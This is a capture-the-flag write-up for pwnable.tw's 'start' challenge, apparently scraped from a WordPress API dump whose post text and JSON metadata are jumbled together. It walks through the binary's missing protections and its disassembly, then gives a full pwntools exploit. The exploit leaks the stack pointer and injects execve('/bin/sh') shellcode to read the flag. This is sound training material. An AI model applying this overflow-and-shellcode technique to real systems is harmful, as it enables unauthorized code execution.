![\"\"](\"http:\/\/blog.bpcspace.com\/wp-content\/uploads\/2021\/03\/image-3.png\")
<\/figure>\n\n\n\nNotice how the stack is executable, and there’s no stack canaries. This will come into play later.<\/p>\n\n\n\n
We can disassemble the program with The program first pushes the stack pointer, then the return address (_exit). After that, it pushes 20 bytes, and prints them to stdout with the first We can overwrite string previously printed, along with 43 more bytes of used space. We can exploit this to overwrite the return address with, you guessed it, the stack pointer. The only issue is we don’t know where the stack is. While the binary doesn’t have PIE, where our data resides on the stack will still vary due to things such as environment variables. This binary is way to small and simple to do a ROP chain, so we’ll have to leak the stack.<\/p>\n\n\n\n If we go to address 0x8048087, we’ll print 14 characters of where we are on the stack. That Putting all these things together, we can overflow the return address to leak the stack pointer, calculate offsets from the leak, overflow the same prompt a second time, returning to a stack controlled by us:<\/p>\n\n\n\n The exploit will hand over the flag!<\/p>\n\n\n\n This is the first challenge of pwnable.tw. Fitting to it’s name, it requires some basic knowledge of buffer overflows and x86 assembly. First, let’s see what kind of security it has built in: Notice how the stack is executable, and there’s no stack canaries. This will come into play later. We can disassemble the program […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"templates\/template-full-width.php","format":"standard","meta":{"footnotes":""},"categories":[3,6],"tags":[],"class_list":["post-44","post","type-post","status-publish","format-standard","hentry","category-basic","category-pwnable-tw"],"_links":{"self":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/posts\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=44"}],"version-history":[{"count":0,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/posts\/44\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=44"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=44"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}objdump -dM intel start<\/code>:<\/p>\n\n\n\nstart: file format elf32-i386\n\nDisassembly of section .text:\n\n08048060 <_start>:\n 8048060:\t54 \tpush esp\n 8048061:\t68 9d 80 04 08 \tpush 0x804809d\n 8048066:\t31 c0 \txor eax,eax\n 8048068:\t31 db \txor ebx,ebx\n 804806a:\t31 c9 \txor ecx,ecx\n 804806c:\t31 d2 \txor edx,edx\n 804806e:\t68 43 54 46 3a \tpush 0x3a465443\n 8048073:\t68 74 68 65 20 \tpush 0x20656874\n 8048078:\t68 61 72 74 20 \tpush 0x20747261\n 804807d:\t68 73 20 73 74 \tpush 0x74732073\n 8048082:\t68 4c 65 74 27 \tpush 0x2774654c\n 8048087:\t89 e1 \tmov ecx,esp\n 8048089:\tb2 14 \tmov dl,0x14\n 804808b:\tb3 01 \tmov bl,0x1\n 804808d:\tb0 04 \tmov al,0x4\n 804808f:\tcd 80 \tint 0x80\n 8048091:\t31 db \txor ebx,ebx\n 8048093:\tb2 3c \tmov dl,0x3c\n 8048095:\tb0 03 \tmov al,0x3\n 8048097:\tcd 80 \tint 0x80\n 8048099:\t83 c4 14 \tadd esp,0x14\n 804809c:\tc3 \tret \n\n0804809d <_exit>:\n 804809d:\t5c \tpop esp\n 804809e:\t31 c0 \txor eax,eax\n 80480a0:\t40 \tinc eax\n 80480a1:\tcd 80 \tint 0x80<\/code><\/pre>\n\n\n\nint 0x80<\/code>. dl specifies the amount of characters printed, which is exactly 20 characters (our 5 dwords). The program then reads 63 characters of user input with the second interrupt. This is where the vulnerability is.<\/p>\n\n\n\nadd esp, 0x14<\/code> at the bottom moves our stack pointer past the string previously printed, meaning the first thing it will print is the stack pointer. By leaking the stack pointer, we can jump to the stack by overflowing the same prompt a second time.<\/p>\n\n\n\n#!\/usr\/bin\/env python3\nfrom pwn import *\n\n# just setting things up\ncontext.binary = '.\/start'\nproc = connect('chall.pwnable.tw', 10000)\n\n# we perform our frst buffer overflow after it prompts us to leak the buffer\nproc.sendafter('CTF:', p32(0xb) * 5 + p32(0x8048087)) # 24 bytes\nstack_leak = unpack(proc.recv()[:4]) # stack leak, due to \"push esp\" in first instruction\n\n# This is our payload\npayload = b'\/bin\/sh\\0' # 4 bytes worth\npayload += asm('''\n push 0\n mov eax, 11\n mov ebx, {}\n mov ecx, {}\n mov edx, {}\n int 0x80\n '''.format(stack_leak + 20, stack_leak-60, stack_leak-60))\n\nprint(hex(stack_leak))\nproc.send(p32(0xbbbb) * 5 + p32(stack_leak + 28) + payload)\n\nproc.send('cat \/home\/start\/flag\\n')\nprint(\"The flag is \\\"{}\\\"\".format(proc.recv().decode().strip()))<\/code><\/pre>\n\n\n\n![\"\"](\"http:\/\/blog.bpcspace.com\/wp-content\/uploads\/2021\/03\/image-4.png\")
<\/figure>\n","protected":false},"excerpt":{"rendered":"